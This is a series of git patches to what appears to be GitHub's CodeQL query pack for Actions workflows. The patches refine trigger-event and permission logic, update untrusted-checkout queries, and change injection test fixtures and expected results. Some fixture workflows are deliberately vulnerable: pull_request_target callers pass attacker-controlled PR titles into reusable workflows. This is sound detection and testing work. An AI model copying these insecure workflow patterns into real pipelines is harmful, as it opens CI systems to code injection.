=?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:31:19 +0200 Subject: [PATCH 523/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b4c388cf6152..84d4f5f3678e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.50 +version: 0.1.51 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e5709a523298..0ef4c721e1a2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.50 +version: 0.1.51 groups: [actions, queries] suites: codeql-suites extractor: javascript From 2bfb1565086edc3ab56d7dd1e19fcb0055658c1d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 23:08:58 +0200 Subject: [PATCH 524/707] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d0eb440d0d53..7458cc1b0532 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -416,6 +416,12 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override EventImpl getATriggerEvent() { + this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result + or + this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" + } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } @@ -796,12 +802,11 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingWorkflow().getATriggerEvent() or + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + } - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | From fe06c9e5fa186e27fbe1e2134926b08982a9dfef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:09 +0200 Subject: [PATCH 525/707] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 64 +++++++++++++++++-- .../codeql/actions/security/ControlChecks.qll | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 33 ++++------ .../Security/CWE-829/UntrustedCheckoutHigh.ql | 33 ++++------ .../.github/workflows/documentation.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 2 - .../CWE-078/CommandInjectionMedium.expected | 1 - .../workflows/reusable-workflow-caller-1.yml | 4 +- .../workflows/reusable-workflow-caller-2.yml | 4 +- .../CWE-094/CodeInjectionCritical.expected | 12 ++-- .../CWE-094/CodeInjectionMedium.expected | 12 ++-- .../.github/workflows/reusable_caller3.yaml | 2 +- .../UntrustedCheckoutCritical.expected | 2 - .../CWE-829/UntrustedCheckoutHigh.expected | 4 -- .../CWE-829/UntrustedCheckoutMedium.expected | 6 ++ 15 files changed, 102 insertions(+), 81 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7458cc1b0532..d05174f47878 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -417,8 +417,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override EventImpl getATriggerEvent() { + // The trigger event for a reusable workflow is the trigger event of the caller workflow this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result or + // or the trigger event of the workflow if it has any other than workflow_call this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" } @@ -803,8 +805,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { - result = this.getEnclosingWorkflow().getATriggerEvent() or - result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl + then + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + or + result = this.getEnclosingWorkflow().getATriggerEvent() and + not result.getName() = "workflow_call" + else result = this.getEnclosingWorkflow().getATriggerEvent() } /** Gets the runs-on field of the job. */ @@ -844,9 +851,8 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasExplicitWritePermission() { - // the job has an explicit write permission - this.getPermissions().getAPermission().matches("%write") + private predicate hasExplicitNonePermission() { + exists(this.getPermissions()) and not exists(this.getPermissions().getAPermission()) } private predicate hasExplicitReadPermission() { @@ -855,15 +861,57 @@ class JobImpl extends AstNodeImpl, TJobNode { not this.getPermissions().getAPermission().matches("%write") } - private predicate hasImplicitWritePermission() { + private predicate hasExplicitWritePermission() { // the job has an explicit write permission - this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitNonePermission() { + not exists(this.getPermissions()) and + exists(this.getEnclosingWorkflow().getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions()) and + not exists( + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + ) } private predicate hasImplicitReadPermission() { // the job has not an explicit write permission + not exists(this.getPermissions()) and exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%read") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + not exists(this.getPermissions()) and + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%write") } private predicate hasRuntimeData() { @@ -922,6 +970,8 @@ class JobImpl extends AstNodeImpl, TJobNode { // and the job is not explicitly non-privileged not ( ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or this.hasExplicitReadPermission() or this.hasImplicitReadPermission() ) and diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a47f4d92d02..1a3e1e15fe8c 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,7 +38,7 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + event = step.getEnclosingWorkflow().getATriggerEvent() and this.dominates(step) and this.protectsCategoryAndEvent(category, event.getName()) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9efd9b036cd1..31a4cdf94e54 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,39 +20,28 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step +from PRHeadCheckoutStep checkout, PoisonableStep step, Event event where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select step, checkout, step, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index ce138fb04786..bc6f0e36e56e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -18,39 +18,28 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout, Event event where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml index 46ffbce96280..db04b69ac168 100644 --- a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -2,7 +2,7 @@ name: Documentation on: workflow_dispatch: - workflow_call: + pull_request: jobs: parse_commit_info: diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index e2fe23cccc67..decabad082fb 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,8 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index ebbf2f7cf0b2..99ebb1edc05d 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,6 +1,5 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index 9c0b72dffeac..a237856b6ce7 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -1,11 +1,11 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 46be8d7009df..0f87d1e9394f 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -1,10 +1,10 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 9ebd55088024..818b106b6d77 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -451,9 +451,7 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 26d4741a4692..75b64cea3e59 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -414,10 +414,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml index 1e7558b3bc08..560475dc9384 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -1,7 +1,7 @@ name: assets-test on: - pull_request: + 